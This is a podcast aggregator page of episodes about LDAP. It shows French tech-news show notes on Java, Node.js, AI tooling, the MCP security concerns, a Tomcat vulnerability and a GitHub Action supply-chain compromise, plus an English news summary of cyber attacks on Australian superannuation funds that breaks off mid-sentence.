Podcasts about ldap

Computer network protocol

  • 83PODCASTS
  • 117EPISODES
  • 42mAVG DURATION
  • 1MONTHLY NEW EPISODE
  • May 29, 2025LATEST

POPULARITY

20172018201920202021202220232024


Best podcasts about ldap

Latest podcast episodes about ldap

2.5 Admins
2.5 Admins 249: Octopodian Nightmare

2.5 Admins

Play Episode Listen Later May 29, 2025 29:21


Locating people with just a phone call, Google forces a change to Let's Encrypt certificates, yet another example of a “lifetime” subscription being cut short, connecting drives to a small form factor machine, and managing ssh keys with LDAP.   Plugs Support us on patreon and get an ad-free RSS feed with early episodes sometimes […]

Les Cast Codeurs Podcast
LCC 325 - Trier le hachis des concurrents

Les Cast Codeurs Podcast

Play Episode Listen Later May 9, 2025 109:42


Gros épisode qui couvre un large spectre de sujets : Java, Scala, Micronaut, NodeJS, l'IA et la compétence des développeurs, le sampling dans les LLMs, les DTO, le vibe coding, les changements chez Broadcom et Red Hat ainsi que plusieurs nouvelles sur les licences open source. Enregistré le 7 mai 2025 Téléchargement de l'épisode LesCastCodeurs-Episode-325.mp3 ou en vidéo sur YouTube. News Langages A l'occasion de JavaOne et du lancement de Java 24, Oracle lance un nouveau site avec des ressources vidéo pour apprendre le langage https://learn.java/ site plutôt à destination des débutants et des enseignants couvre la syntaxe aussi, y compris les ajouts plus récents comme les records ou le pattern matching c'est pas le site le plus trendy du monde. Martin Odersky partage un long article sur l'état de l'écosystème Scala et les évolutions du language https://www.scala-lang.org/blog/2025/03/24/evolving-scala.html Stabilité et besoin d'évolution : Scala maintient sa position (~14ème mondial) avec des bases techniques solides, mais doit évoluer face à la concurrence pour rester pertinent. Axes prioritaires : L'évolution se concentre sur l'amélioration du duo sécurité/convivialité, le polissage du langage (suppression des “rugosités”) et la simplification pour les débutants. Innovation continue : Geler les fonctionnalités est exclu ; l'innovation est clé pour la valeur de Scala. Le langage doit rester généraliste et ne pas se lier à un framework spécifique. Défis et progrès : L'outillage (IDE, outils de build comme sbt, scala-cli, Mill) et la facilité d'apprentissage de l'écosystème sont des points d'attention, avec des améliorations en cours (partenariat pédagogique, plateformes simples). Des strings encore plus rapides ! https://inside.java/2025/05/01/strings-just-got-faster/ Dans JDK 25, la performance de la fonction String::hashCode a été améliorée pour être principalement constant foldable. Cela signifie que si les chaînes de caractères sont utilisées comme clés dans une Map statique et immuable, des gains de performance significatifs sont probables. L'amélioration repose sur l'annotation interne @Stable appliquée au champ privé String.hash. Cette annotation permet à la machine virtuelle de lire la valeur du hash une seule fois et de la considérer comme constante si elle n'est pas la valeur par défaut (zéro). Par conséquent, l'opération String::hashCode peut être remplacée par la valeur de hash connue, optimisant ainsi les lookups dans les Map immuables. Un cas limite est celui où le code de hachage de la chaîne est zéro, auquel cas l'optimisation ne fonctionne pas (par exemple, pour la chaîne vide “”). Bien que l'annotation @Stable soit interne au JDK, un nouveau JEP (JEP 502: Stable Values (Preview)) est en cours de développement pour permettre aux utilisateurs de bénéficier indirectement de fonctionnalités similaires. AtomicHash, une implémentation Java d'une HashMap qui est thread-safe, atomique et non-bloquante https://github.com/arxila/atomichash implémenté sous forme de version immutable de Concurrent Hash Trie Librairies Sortie de Micronaut 4.8.0 https://micronaut.io/2025/04/01/micronaut-framework-4-8-0-released/ Mise à jour de la BOM (Bill of Materials) : La version 4.8.0 met à jour la BOM de la plateforme Micronaut. Améliorations de Micronaut Core : Intégration de Micronaut SourceGen pour la génération interne de métadonnées et d'expressions bytecode. Nombreuses améliorations dans Micronaut SourceGen. Ajout du traçage de l'injection de dépendances pour faciliter le débogage au démarrage et à la création des beans. Nouveau membre definitionType dans l'annotation @Client pour faciliter le partage d'interfaces entre client et serveur. Support de la fusion dans les Bean Mappers via l'annotation @Mapping. Nouvelle liveness probe détectant les threads bloqués (deadlocked) via ThreadMXBean. Intégration Kubernetes améliorée : Mise à jour du client Java Kubernetes vers la version 22.0.1. Ajout du module Micronaut Kubernetes Client OpenAPI, offrant une alternative au client officiel avec moins de dépendances, une configuration unifiée, le support des filtres et la compatibilité Native Image. Introduction d'un nouveau runtime serveur basé sur le serveur HTTP intégré de Java, permettant de créer des applications sans dépendances serveur externes. Ajout dans Micronaut Micrometer d'un module pour instrumenter les sources de données (traces et métriques). Ajout de la condition condition dans l'annotation @MetricOptions pour contrôler l'activation des métriques via une expression. Support des Consul watches dans Micronaut Discovery Client pour détecter les changements de configuration distribuée. Possibilité de générer du code source à partir d'un schéma JSON via les plugins de build (Gradle et Maven). Web Node v24.0.0 passe en version Current: https://nodejs.org/en/blog/release/v24.0.0 Mise à jour du moteur V8 vers la version 13.6 : intégration de nouvelles fonctionnalités JavaScript telles que Float16Array, la gestion explicite des ressources (using), RegExp.escape, WebAssembly Memory64 et Error.isError. npm 11 inclus : améliorations en termes de performance, de sécurité et de compatibilité avec les packages JavaScript modernes. Changement de compilateur pour Windows : abandon de MSVC au profit de ClangCL pour la compilation de Node.js sur Windows. AsyncLocalStorage utilise désormais AsyncContextFrame par défaut : offrant une gestion plus efficace du contexte asynchrone. URLPattern disponible globalement : plus besoin d'importer explicitement cette API pour effectuer des correspondances d'URL. Améliorations du modèle de permissions : le flag expérimental --experimental-permission devient --permission, signalant une stabilité accrue de cette fonctionnalité. Améliorations du test runner : les sous-tests sont désormais attendus automatiquement, simplifiant l'écriture des tests et réduisant les erreurs liées aux promesses non gérées. Intégration d'Undici 7 : amélioration des capacités du client HTTP avec de meilleures performances et un support étendu des fonctionnalités HTTP modernes. Dépréciations et suppressions : Dépréciation de url.parse() au profit de l'API WHATWG URL. Suppression de tls.createSecurePair. Dépréciation de SlowBuffer. Dépréciation de l'instanciation de REPL sans new. Dépréciation de l'utilisation des classes Zlib sans new. Dépréciation du passage de args à spawn et execFile dans child_process. Node.js 24 est actuellement la version “Current” et deviendra une version LTS en octobre 2025. Il est recommandé de tester cette version pour évaluer son impact sur vos applications. Data et Intelligence Artificielle Apprendre à coder reste crucial et l'IA est là pour venir en aide : https://kyrylo.org/software/2025/03/27/learn-to-code-ignore-ai-then-use-ai-to-code-even-better.html Apprendre à coder reste essentiel malgré l'IA. L'IA peut assister la programmation. Une solide base est cruciale pour comprendre et contrôler le code. Cela permet d'éviter la dépendance à l'IA. Cela réduit le risque de remplacement par des outils d'IA accessibles à tous. L'IA est un outil, pas un substitut à la maîtrise des fondamentaux. Super article de Anthropic qui essaie de comprendre comment fonctionne la “pensée” des LLMs https://www.anthropic.com/research/tracing-thoughts-language-model Effet boîte noire : Stratégies internes des IA (Claude) opaques aux développeurs et utilisateurs. Objectif : Comprendre le “raisonnement” interne pour vérifier capacités et intentions. Méthode : Inspiration neurosciences, développement d'un “microscope IA” (regarder quels circuits neuronaux s'activent). Technique : Identification de concepts (“features”) et de “circuits” internes. Multilinguisme : Indice d'un “langage de pensée” conceptuel commun à toutes les langues avant de traduire dans une langue particulière. Planification : Capacité à anticiper (ex: rimes en poésie), pas seulement de la génération mot par mot (token par token). Raisonnement non fidèle : Peut fabriquer des arguments plausibles (“bullshitting”) pour une conclusion donnée. Logique multi-étapes : Combine des faits distincts, ne se contente pas de mémoriser. Hallucinations : Refus par défaut ; réponse si “connaissance” active, sinon risque d'hallucination si erreur. “Jailbreaks” : Tension entre cohérence grammaticale (pousse à continuer) et sécurité (devrait refuser). Bilan : Méthodes limitées mais prometteuses pour la transparence et la fiabilité de l'IA. Le “S” dans MCP veut dire Securité (ou pas !) https://elenacross7.medium.com/%EF%B8%8F-the-s-in-mcp-stands-for-security-91407b33ed6b La spécification MCP pour permettre aux LLMs d'avoir accès à divers outils et fonctions a peut-être été adoptée un peu rapidement, alors qu'elle n'était pas encore prête niveau sécurité L'article liste 4 types d'attaques possibles : vulnérabilité d'injection de commandes attaque d'empoisonnement d'outils redéfinition silencieuse de l'outil le shadowing d'outils inter-serveurs Pour l'instant, MCP n'est pas sécurisé : Pas de standard d'authentification Pas de chiffrement de contexte Pas de vérification d'intégrité des outils Basé sur l'article de InvariantLabs https://invariantlabs.ai/blog/mcp-security-notification-tool-poisoning-attacks Sortie Infinispan 15.2 - pre rolling upgrades 16.0 https://infinispan.org/blog/2025/03/27/infinispan-15-2 Support de Redis JSON + scripts Lua Métriques JVM désactivables Nouvelle console (PatternFly 6) Docs améliorées (métriques + logs) JDK 17 min, support JDK 24 Fin du serveur natif (performances) Guillaume montre comment développer un serveur MCP HTTP Server Sent Events avec l'implémentation de référence Java et LangChain4j https://glaforge.dev/posts/2025/04/04/mcp-client-and-server-with-java-mcp-sdk-and-langchain4j/ Développé en Java, avec l'implémentation de référence qui est aussi à la base de l'implémentation dans Spring Boot (mais indépendant de Spring) Le serveur MCP est exposé sous forme de servlet dans Jetty Le client MCP lui, est développé avec le module MCP de LangChain4j c'est semi independant de Spring dans le sens où c'est dépendant de Reactor et de ses interface. il y a une conversation sur le github d'anthropic pour trouver une solution, mais cela ne parait pas simple. Les fallacies derrière la citation “AI won't replace you, but humans using AI will” https://platforms.substack.com/cp/161356485 La fallacie de l'automatisation vs. l'augmentation : Elle se concentre sur l'amélioration des tâches existantes avec l'IA au lieu de considérer le changement de la valeur de ces tâches dans un nouveau système. La fallacie des gains de productivité : L'augmentation de la productivité ne se traduit pas toujours par plus de valeur pour les travailleurs, car la valeur créée peut être capturée ailleurs dans le système. La fallacie des emplois statiques : Les emplois sont des constructions organisationnelles qui peuvent être redéfinies par l'IA, rendant les rôles traditionnels obsolètes. La fallacie de la compétition “moi vs. quelqu'un utilisant l'IA” : La concurrence évolue lorsque l'IA modifie les contraintes fondamentales d'un secteur, rendant les compétences existantes moins pertinentes. La fallacie de la continuité du flux de travail : L'IA peut entraîner une réimagination complète des flux de travail, éliminant le besoin de certaines compétences. La fallacie des outils neutres : Les outils d'IA ne sont pas neutres et peuvent redistribuer le pouvoir organisationnel en changeant la façon dont les décisions sont prises et exécutées. La fallacie du salaire stable : Le maintien d'un emploi ne garantit pas un salaire stable, car la valeur du travail peut diminuer avec l'augmentation des capacités de l'IA. La fallacie de l'entreprise stable : L'intégration de l'IA nécessite une restructuration de l'entreprise et ne se fait pas dans un vide organisationnel. Comprendre le “sampling” dans les LLMs https://rentry.co/samplers Explique pourquoi les LLMs utilisent des tokens Les différentes méthodes de “sampling” : càd de choix de tokens Les hyperparamètres comme la température, top-p, et leur influence réciproque Les algorithmes de tokenisation comme Byte Pair Encoding et SentencePiece. Un de moins … OpenAI va racheter Windsurf pour 3 milliards de dollars. https://www.bloomberg.com/news/articles/2025-05-06/openai-reaches-agreement-to-buy-startup-windsurf-for-3-billion l'accord n'est pas encore finalisé Windsurf était valorisé à 1,25 milliards l'an dernier et OpenAI a levé 40 milliards dernièrement portant sa valeur à 300 milliards Le but pour OpenAI est de rentrer dans le monde des assistants de code pour lesquels ils sont aujourd'hui absent Docker desktop se met à l'IA… ? Une nouvelle fonctionnalité dans docker desktop 4.4 sur macos: Docker Model Runner https://dev.to/docker/run-genai-models-locally-with-docker-model-runner-5elb Permet de faire tourner des modèles nativement en local ( https://docs.docker.com/model-runner/ ) mais aussi des serveurs MCP ( https://docs.docker.com/ai/mcp-catalog-and-toolkit/ ) Outillage Jetbrains défend la suppression des commentaires négatifs sur son assistant IA https://devclass.com/2025/04/30/jetbrains-defends-removal-of-negative-reviews-for-unpopular-ai-assistant/?td=rt-3a L'IA Assistant de JetBrains, lancée en juillet 2023, a été téléchargée plus de 22 millions de fois mais n'est notée que 2,3 sur 5. Des utilisateurs ont remarqué que certaines critiques négatives étaient supprimées, ce qui a provoqué une réaction négative sur les réseaux sociaux. Un employé de JetBrains a expliqué que les critiques ont été supprimées soit parce qu'elles mentionnaient des problèmes déjà résolus, soit parce qu'elles violaient leur politique concernant les “grossièretés, etc.” L'entreprise a reconnu qu'elle aurait pu mieux gérer la situation, un représentant déclarant : “Supprimer plusieurs critiques d'un coup sans préavis semblait suspect. Nous aurions dû au moins publier un avis et fournir plus de détails aux auteurs.” Parmi les problèmes de l'IA Assistant signalés par les utilisateurs figurent : un support limité pour les fournisseurs de modèles tiers, une latence notable, des ralentissements fréquents, des fonctionnalités principales verrouillées aux services cloud de JetBrains, une expérience utilisateur incohérente et une documentation insuffisante. Une plainte courante est que l'IA Assistant s'installe sans permission. Un utilisateur sur Reddit l'a qualifié de “plugin agaçant qui s'auto-répare/se réinstalle comme un phénix”. JetBrains a récemment introduit un niveau gratuit et un nouvel agent IA appelé Junie, destiné à fonctionner parallèlement à l'IA Assistant, probablement en réponse à la concurrence entre fournisseurs. Mais il est plus char a faire tourner. La société s'est engagée à explorer de nouvelles approches pour traiter les mises à jour majeures différemment et envisage d'implémenter des critiques par version ou de marquer les critiques comme “Résolues” avec des liens vers les problèmes correspondants au lieu de les supprimer. Contrairement à des concurrents comme Microsoft, AWS ou Google, JetBrains commercialise uniquement des outils et services de développement et ne dispose pas d'une activité cloud distincte sur laquelle s'appuyer. Vos images de README et fichiers Markdown compatibles pour le dark mode de GitHub: https://github.blog/developer-skills/github/how-to-make-your-images-in-markdown-on-github-adjust-for-dark-mode-and-light-mode/ Seulement quelques lignes de pure HTML pour le faire Architecture Alors, les DTOs, c'est bien ou c'est pas bien ? https://codeopinion.com/dtos-mapping-the-good-the-bad-and-the-excessive/ Utilité des DTOs : Les DTOs servent à transférer des données entre les différentes couches d'une application, en mappant souvent les données entre différentes représentations (par exemple, entre la base de données et l'interface utilisateur). Surutilisation fréquente : L'article souligne que les DTOs sont souvent utilisés de manière excessive, notamment pour créer des API HTTP qui ne font que refléter les entités de la base de données, manquant ainsi l'opportunité de composer des données plus riches. Vraie valeur : La valeur réelle des DTOs réside dans la gestion du couplage entre les couches et la composition de données provenant de sources multiples en formes optimisées pour des cas d'utilisation spécifiques. Découplage : Il est suggéré d'utiliser les DTOs pour découpler les modèles de données internes des contrats externes (comme les API), ce qui permet une évolution et une gestion des versions indépendantes. Exemple avec CQRS : Dans le cadre de CQRS (Command Query Responsibility Segregation), les réponses aux requêtes (queries) agissent comme des DTOs spécifiquement adaptés aux besoins de l'interface utilisateur, pouvant inclure des données de diverses sources. Protection des données internes : Les DTOs aident à distinguer et protéger les modèles de données internes (privés) des changements externes (publics). Éviter l'excès : L'auteur met en garde contre les couches de mapping excessives (mapper un DTO vers un autre DTO) qui n'apportent pas de valeur ajoutée. Création ciblée : Il est conseillé de ne créer des DTOs que lorsqu'ils résolvent des problèmes concrets, tels que la gestion du couplage ou la facilitation de la composition de données. Méthodologies Même Guillaume se met au “vibe coding” https://glaforge.dev/posts/2025/05/02/vibe-coding-an-mcp-server-with-micronaut-and-gemini/ Selon Andrey Karpathy, c'est le fait de POC-er un proto, une appli jetable du weekend https://x.com/karpathy/status/1886192184808149383 Mais Simon Willison s'insurge que certains confondent coder avec l'assistance de l'IA avec le vibe coding https://simonwillison.net/2025/May/1/not-vibe-coding/ Guillaume c'est ici amusé à développer un serveur MCP avec Micronaut, en utilisant Gemini, l'IA de Google. Contrairement à Quarkus ou Spring Boot, Micronaut n'a pas encore de module ou de support spécifique pour faciliter la création de serveur MCP Sécurité Une faille de sécurité 10/10 sur Tomcat https://www.it-connect.fr/apache-tomcat-cette-faille-activement-exploitee-seulement-30-heures-apres-sa-divulgation-patchez/ Une faille de sécurité critique (CVE-2025-24813) affecte Apache Tomcat, permettant l'exécution de code à distance Cette vulnérabilité est activement exploitée seulement 30 heures après sa divulgation du 10 mars 2025 L'attaque ne nécessite aucune authentification et est particulièrement simple à exécuter Elle utilise une requête PUT avec une charge utile Java sérialisée encodée en base64, suivie d'une requête GET L'encodage en base64 permet de contourner la plupart des filtres de sécurité Les serveurs vulnérables utilisent un stockage de session basé sur des fichiers (configuration répandue) Les versions affectées sont : 11.0.0-M1 à 11.0.2, 10.1.0-M1 à 10.1.34, et 9.0.0.M1 à 9.0.98 Les mises à jour recommandées sont : 11.0.3+, 10.1.35+ et 9.0.99+ Les experts prévoient des attaques plus sophistiquées dans les prochaines phases d'exploitation (upload de config ou jsp) Sécurisation d'un serveur ssh https://ittavern.com/ssh-server-hardening/ un article qui liste les configurations clés pour sécuriser un serveur SSH par exemple, enlever password authentigfication, changer de port, desactiver le login root, forcer le protocol ssh 2, certains que je ne connaissais pas comme MaxStartups qui limite le nombre de connections non authentifiées concurrentes Port knocking est une technique utile mais demande une approche cliente consciente du protocol Oracle admet que les identités IAM de ses clients ont leaké https://www.theregister.com/2025/04/08/oracle_cloud_compromised/ Oracle a confirmé à certains clients que son cloud public a été compromis, alors que l'entreprise avait précédemment nié toute intrusion. Un pirate informatique a revendiqué avoir piraté deux serveurs d'authentification d'Oracle et volé environ six millions d'enregistrements, incluant des clés de sécurité privées, des identifiants chiffrés et des entrées LDAP. La faille exploitée serait la vulnérabilité CVE-2021-35587 dans Oracle Access Manager, qu'Oracle n'avait pas corrigée sur ses propres systèmes. Le pirate a créé un fichier texte début mars sur login.us2.oraclecloud.com contenant son adresse email pour prouver son accès. Selon Oracle, un ancien serveur contenant des données vieilles de huit ans aurait été compromis, mais un client affirme que des données de connexion aussi récentes que 2024 ont été dérobées. Oracle fait face à un procès au Texas concernant cette violation de données. Cette intrusion est distincte d'une autre attaque contre Oracle Health, sur laquelle l'entreprise refuse de commenter. Oracle pourrait faire face à des sanctions sous le RGPD européen qui exige la notification des parties affectées dans les 72 heures suivant la découverte d'une fuite de données. Le comportement d'Oracle consistant à nier puis à admettre discrètement l'intrusion est inhabituel en 2025 et pourrait mener à d'autres actions en justice collectives. Une GitHub action très populaire compromise https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised Compromission de l'action tj-actions/changed-files : En mars 2025, une action GitHub très utilisée (tj-actions/changed-files) a été compromise. Des versions modifiées de l'action ont exposé des secrets CI/CD dans les logs de build. Méthode d'attaque : Un PAT compromis a permis de rediriger plusieurs tags de version vers un commit contenant du code malveillant. Détails du code malveillant : Le code injecté exécutait une fonction Node.js encodée en base64, qui téléchargeait un script Python. Ce script parcourait la mémoire du runner GitHub à la recherche de secrets (tokens, clés…) et les exposait dans les logs. Dans certains cas, les données étaient aussi envoyées via une requête réseau. Période d'exposition : Les versions compromises étaient actives entre le 12 et le 15 mars 2025. Tout dépôt, particulièrement ceux publiques, ayant utilisé l'action pendant cette période doit être considéré comme potentiellement exposé. Détection : L'activité malveillante a été repérée par l'analyse des comportements inhabituels pendant l'exécution des workflows, comme des connexions réseau inattendues. Réaction : GitHub a supprimé l'action compromise, qui a ensuite été nettoyée. Impact potentiel : Tous les secrets apparaissant dans les logs doivent être considérés comme compromis, même dans les dépôts privés, et régénérés sans délai. Loi, société et organisation Les startup the YCombinateur ont les plus fortes croissances de leur histoire https://www.cnbc.com/2025/03/15/y-combinator-startups-are-fastest-growing-in-fund-history-because-of-ai.html Les entreprises en phase de démarrage à Silicon Valley connaissent une croissance significative grâce à l'intelligence artificielle. Le PDG de Y Combinator, Garry Tan, affirme que l'ensemble des startups de la dernière cohorte a connu une croissance hebdomadaire de 10% pendant neuf mois. L'IA permet aux développeurs d'automatiser des tâches répétitives et de générer du code grâce aux grands modèles de langage. Pour environ 25% des startups actuelles de YC, 95% de leur code a été écrit par l'IA. Cette révolution permet aux entreprises de se développer avec moins de personnel - certaines atteignant 10 millions de dollars de revenus avec moins de 10 employés. La mentalité de “croissance à tout prix” a été remplacée par un renouveau d'intérêt pour la rentabilité. Environ 80% des entreprises présentées lors du “demo day” étaient centrées sur l'IA, avec quelques startups en robotique et semi-conducteurs. Y Combinator investit 500 000 dollars dans les startups en échange d'une participation au capital, suivi d'un programme de trois mois. Red Hat middleware (ex-jboss) rejoint IBM https://markclittle.blogspot.com/2025/03/red-hat-middleware-moving-to-ibm.html Les activités Middleware de Red Hat (incluant JBoss, Quarkus, etc.) vont être transférées vers IBM, dans l'unité dédiée à la sécurité des données, à l'IAM et aux runtimes. Ce changement découle d'une décision stratégique de Red Hat de se concentrer davantage sur le cloud hybride et l'intelligence artificielle. Mark Little explique que ce transfert était devenu inévitable, Red Hat ayant réduit ses investissements dans le Middleware ces dernières années. L'intégration vise à renforcer l'innovation autour de Java en réunissant les efforts de Red Hat et IBM sur ce sujet. Les produits Middleware resteront open source et les clients continueront à bénéficier du support habituel sans changement. Mark Little affirme que des projets comme Quarkus continueront à être soutenus et que cette évolution est bénéfique pour la communauté Java. Un an de commonhaus https://www.commonhaus.org/activity/253.html un an, démarré sur les communautés qu'ils connaissaient bien maintenant 14 projets et put en accepter plus confiance, gouvernance legère et proteger le futur des projets automatisation de l'administratif, stabiilité sans complexité, les developpeurs au centre du processus de décision ils ont besoins de members et supporters (financiers) ils veulent accueillir des projets au delà de ceux du cercles des Java Champions Spring Cloud Data Flow devient un produit commercial et ne sera plus maintenu en open source https://spring.io/blog/2025/04/21/spring-cloud-data-flow-commercial Peut-être sous l'influence de Broadcom, Spring se met à mettre en mode propriétaire des composants du portefeuille Spring ils disent que peu de gens l'utilisaent en mode OSS et la majorité venait d'un usage dans la plateforme Tanzu Maintenir en open source le coutent du temps qu'ils son't pas sur ces projets. La CNCF protège le projet NATS, dans la fondation depuis 2018, vu que la société Synadia qui y contribue souhaitait reprendre le contrôle du projet https://www.cncf.io/blog/2025/04/24/protecting-nats-and-the-integrity-of-open-source-cncfs-commitment-to-the-community/ CNCF : Protège projets OS, gouvernance neutre. Synadia vs CNCF : Veut retirer NATS, licence non-OS (BUSL). CNCF : Accuse Synadia de “claw back” (reprise illégitime). Revendications Synadia : Domaine nats.io, orga GitHub. Marque NATS : Synadia n'a pas transféré (promesse rompue malgré aide CNCF). Contestation Synadia : Juge règles CNCF “trop vagues”. Vote interne : Mainteneurs Synadia votent sortie CNCF (sans communauté). Support CNCF : Investissement majeur ($ audits, légal), succès communautaire (>700 orgs). Avenir NATS (CNCF) : Maintien sous Apache 2.0, gouvernance ouverte. Actions CNCF : Health check, appel mainteneurs, annulation marque Synadia, rejet demandes. Mais finalement il semble y avoir un bon dénouement : https://www.cncf.io/announcements/2025/05/01/cncf-and-synadia-align-on-securing-the-future-of-the-nats-io-project/ Accord pour l'avenir de NATS.io : La Cloud Native Computing Foundation (CNCF) et Synadia ont conclu un accord pour sécuriser le futur du projet NATS.io. Transfert des marques NATS : Synadia va céder ses deux enregistrements de marque NATS à la Linux Foundation afin de renforcer la gouvernance ouverte du projet. Maintien au sein de la CNCF : L'infrastructure et les actifs du projet NATS resteront sous l'égide de la CNCF, garantissant ainsi sa stabilité à long terme et son développement en open source sous licence Apache-2.0. Reconnaissance et engagement : La Linux Foundation, par la voix de Todd Moore, reconnaît les contributions de Synadia et son soutien continu. Derek Collison, PDG de Synadia, réaffirme l'engagement de son entreprise envers NATS et la collaboration avec la Linux Foundation et la CNCF. Adoption et soutien communautaire : NATS est largement adopté et considéré comme une infrastructure critique. Il bénéficie d'un fort soutien de la communauté pour sa nature open source et l'implication continue de Synadia. Finalement, Redis revient vers une licence open source OSI, avec la AGPL https://foojay.io/today/redis-is-now-available-under-the-agplv3-open-source-license/ Redis passe à la licence open source AGPLv3 pour contrer l'exploitation par les fournisseurs cloud sans contribution. Le passage précédent à la licence SSPL avait nui à la relation avec la communauté open source. Salvatore Sanfilippo (antirez) est revenu chez Redis. Redis 8 adopte la licence AGPL, intègre les fonctionnalités de Redis Stack (JSON, Time Series, etc.) et introduit les “vector sets” (le support de calcul vectoriel développé par Salvatore). Ces changements visent à renforcer Redis en tant que plateforme appréciée des développeurs, conformément à la vision initiale de Salvatore. Conférences La liste des conférences provenant de Developers Conferences Agenda/List par Aurélie Vache et contributeurs : 6-7 mai 2025 : GOSIM AI Paris - Paris (France) 7-9 mai 2025 : Devoxx UK - London (UK) 15 mai 2025 : Cloud Toulouse - Toulouse (France) 16 mai 2025 : AFUP Day 2025 Lille - Lille (France) 16 mai 2025 : AFUP Day 2025 Lyon - Lyon (France) 16 mai 2025 : AFUP Day 2025 Poitiers - Poitiers (France) 22-23 mai 2025 : Flupa UX Days 2025 - Paris (France) 24 mai 2025 : Polycloud - Montpellier (France) 24 mai 2025 : NG Baguette Conf 2025 - Nantes (France) 3 juin 2025 : TechReady - Nantes (France) 5-6 juin 2025 : AlpesCraft - Grenoble (France) 5-6 juin 2025 : Devquest 2025 - Niort (France) 10-11 juin 2025 : Modern Workplace Conference Paris 2025 - Paris (France) 11-13 juin 2025 : Devoxx Poland - Krakow (Poland) 12 juin 2025 : Positive Design Days - Strasbourg (France) 12-13 juin 2025 : Agile Tour Toulouse - Toulouse (France) 12-13 juin 2025 : DevLille - Lille (France) 13 juin 2025 : Tech F'Est 2025 - Nancy (France) 17 juin 2025 : Mobilis In Mobile - Nantes (France) 19-21 juin 2025 : Drupal Barcamp Perpignan 2025 - Perpignan (France) 24 juin 2025 : WAX 2025 - Aix-en-Provence (France) 25-26 juin 2025 : Agi'Lille 2025 - Lille (France) 25-27 juin 2025 : BreizhCamp 2025 - Rennes (France) 26-27 juin 2025 : Sunny Tech - Montpellier (France) 1-4 juillet 2025 : Open edX Conference - 2025 - Palaiseau (France) 7-9 juillet 2025 : Riviera DEV 2025 - Sophia Antipolis (France) 5 septembre 2025 : JUG Summer Camp 2025 - La Rochelle (France) 12 septembre 2025 : Agile Pays Basque 2025 - Bidart (France) 18-19 septembre 2025 : API Platform Conference - Lille (France) & Online 23 septembre 2025 : OWASP AppSec France 2025 - Paris (France) 25-26 septembre 2025 : Paris Web 2025 - Paris (France) 2-3 octobre 2025 : Volcamp - Clermont-Ferrand (France) 3 octobre 2025 : DevFest Perros-Guirec 2025 - Perros-Guirec (France) 6-10 octobre 2025 : Devoxx Belgium - Antwerp (Belgium) 7 octobre 2025 : BSides Mulhouse - Mulhouse (France) 9-10 octobre 2025 : Forum PHP 2025 - Marne-la-Vallée (France) 9-10 octobre 2025 : EuroRust 2025 - Paris (France) 16 octobre 2025 : PlatformCon25 Live Day Paris - Paris (France) 16-17 octobre 2025 : DevFest Nantes - Nantes (France) 30-31 octobre 2025 : Agile Tour Bordeaux 2025 - Bordeaux (France) 30-31 octobre 2025 : Agile Tour Nantais 2025 - Nantes (France) 30 octobre 2025-2 novembre 2025 : PyConFR 2025 - Lyon (France) 4-7 novembre 2025 : NewCrafts 2025 - Paris (France) 6 novembre 2025 : dotAI 2025 - Paris (France) 7 novembre 2025 : BDX I/O - Bordeaux (France) 12-14 novembre 2025 : Devoxx Morocco - Marrakech (Morocco) 13 novembre 2025 : DevFest Toulouse - Toulouse (France) 15-16 novembre 2025 : Capitole du Libre - Toulouse (France) 20 novembre 2025 : OVHcloud Summit - Paris (France) 21 novembre 2025 : DevFest Paris 2025 - Paris (France) 27 novembre 2025 : Devfest Strasbourg 2025 - Strasbourg (France) 28 novembre 2025 : DevFest Lyon - Lyon (France) 5 décembre 2025 : DevFest Dijon 2025 - Dijon (France) 10-11 décembre 2025 : Devops REX - Paris (France) 10-11 décembre 2025 : Open Source Experience - Paris (France) 28-31 janvier 2026 : SnowCamp 2026 - Grenoble (France) 2-6 février 2026 : Web Days Convention - Aix-en-Provence (France) 23-25 avril 2026 : Devoxx Greece - Athens (Greece) 17 juin 2026 : Devoxx Poland - Krakow (Poland) Nous contacter Pour réagir à cet épisode, venez discuter sur le groupe Google https://groups.google.com/group/lescastcodeurs Contactez-nous via X/twitter https://twitter.com/lescastcodeurs ou Bluesky https://bsky.app/profile/lescastcodeurs.com Faire un crowdcast ou une crowdquestion Soutenez Les Cast Codeurs sur Patreon https://www.patreon.com/LesCastCodeurs Tous les épisodes et toutes les infos sur https://lescastcodeurs.com/

Cyber Bites
Cyber Bites - 11th April 2025

Cyber Bites

Play Episode Listen Later Apr 10, 2025 7:45


* Cyber Attacks Target Multiple Australian Super Funds, Half Million Dollars Stolen* Intelligence Agencies Warn of "Fast Flux" Threat to National Security* SpotBugs Token Theft Revealed as Origin of Multi-Stage GitHub Supply Chain Attack* ASIC Secures Court Orders to Shut Down 95 "Hydra-Like" Scam Companies* Oracle Acknowledges "Legacy Environment" Breach After Weeks of DenialCyber Attacks Target Multiple Australian Super Funds, Half Million Dollars Stolenhttps://www.itnews.com.au/news/aussie-super-funds-targeted-by-fraudsters-using-stolen-creds-616269https://www.abc.net.au/news/2025-04-04/superannuation-cyber-attack-rest-afsa/105137820Multiple Australian superannuation funds have been hit by a wave of cyber attacks, with AustralianSuper confirming that four members have lost a combined $500,000 in retirement savings. The nation's largest retirement fund has reportedly faced approximately 600 attempted cyber attacks in the past month alone.AustralianSuper has now confirmed that "up to 600" of its members were impacted by the incident. Chief member officer Rose Kerlin stated, "This week we identified that cyber criminals may have used up to 600 members' stolen passwords to log into their accounts in attempts to commit fraud." The fund has taken "immediate action to lock these accounts" and notify affected members.Rest Super has also been impacted, with CEO Vicki Doyle confirming that "less than one percent" of its members were affected—equivalent to fewer than 20,000 accounts based on recent membership reports. Rest detected "unauthorised activity" on its member access portal "over the weekend of 29-30 March" and "responded immediately by shutting down the member access portal, undertaking investigations and launching our cyber security incident response protocols."While Rest stated that no member funds were transferred out of accounts, "limited personal information" was likely accessed. "We are in the process of contacting impacted members to work through what this means for them and provide support," Doyle said.HostPlus has confirmed it is "actively investigating the situation" but stated that "no HostPlus member losses have occurred" so far. Several other funds including Insignia and Australian Retirement were also reportedly affected.Members across multiple funds have reported difficulty accessing their accounts online, with some logging in to find alarming $0 balances displayed. The disruption has caused considerable anxiety among account holders.National cyber security coordinator Lieutenant General Michelle McGuinness confirmed that "cyber criminals are targeting individual account holders of a number of superannuation funds" and is coordinating with government agencies and industry stakeholders in response. The Australian Prudential Regulation Authority (APRA) and Australian Securities and Investments Commission (ASIC) are engaging with all potentially impacted funds.AustralianSuper urged members to log into their accounts "to check that their bank account and contact details are correct and make sure they have a strong and unique password that is not used for other sites." The fund also noted it has been working with "the Australian Signals Directorate, the National Office of Cyber Security, regulators and other authorities" since detecting the unauthorised access.If you're a member of any 